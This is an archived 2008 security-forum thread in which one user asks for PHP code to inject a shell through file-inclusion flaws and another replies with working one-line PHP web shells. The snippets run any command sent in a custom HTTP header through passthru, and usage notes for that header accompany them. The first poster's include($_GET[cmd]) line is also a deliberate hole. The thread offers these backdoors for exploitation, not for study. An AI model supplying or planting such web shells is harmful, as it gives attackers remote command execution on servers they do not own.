|
|
|
|
Menu |
|
|
Home |
| |
|
Discussions |
| |
|
Tools |
| |
|
Affiliates |
| |
|
Content |
| |
|
Info |
| | |
|
|
|
|
|
User Info |
|
Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 135
Members: 0
Total: 135
|
|
|
|
|
|
Full disclosure |
|
|
|
|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
PHP version 5 exploits ? |
|
Posted: Sun Apr 20, 2008 3:59 pm |
|
|
nuckel |
Active user |
|
|
Joined: Mar 25, 2008 |
Posts: 28 |
|
|
|
|
|
|
|
Hi all
How I can inject a shell, in php version 5.x, I mean, I need a PHP code for the LFI & RFI exploits
to exploite it
thankx . . . |
|
|
|
|
Posted: Mon Apr 21, 2008 5:17 pm |
|
|
pexli |
Valuable expert |
|
|
Joined: May 24, 2007 |
Posts: 665 |
Location: Bulgaria |
|
|
|
|
|
|
I don't understand a shitt. |
|
|
|
|
Posted: Mon Apr 21, 2008 7:28 pm |
|
|
nuckel |
Active user |
|
|
Joined: Mar 25, 2008 |
Posts: 28 |
|
|
|
|
|
|
|
koko wrote: | I don't understand a shitt. |
i mean an Vulnerability to exploite it , look's at the examples :
Code: | <?include($_GET[cmd])?> |
this exploit , it's working in PHP version 4.x.x , but in PHP version 5.x.x , does not work , so i want and i need a small code PHP exploit for PHP version 5.x.x , and thankx for any Help |
|
|
|
|
Posted: Tue Apr 22, 2008 3:08 pm |
|
|
pexli |
Valuable expert |
|
|
Joined: May 24, 2007 |
Posts: 665 |
Location: Bulgaria |
|
|
|
|
|
|
Code: | <? if (@getenv(HTTP_koko)) {@passthru(@getenv(HTTP_koko));} else{phpinfo();} ?> |
Headers
koko: <w>
Code: | <?php @passthru(@getenv("HTTP_koko"));exit;?> |
Headers
koko: <w> |
|
|
|
|
www.waraxe.us Forum Index -> All other security holes
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
|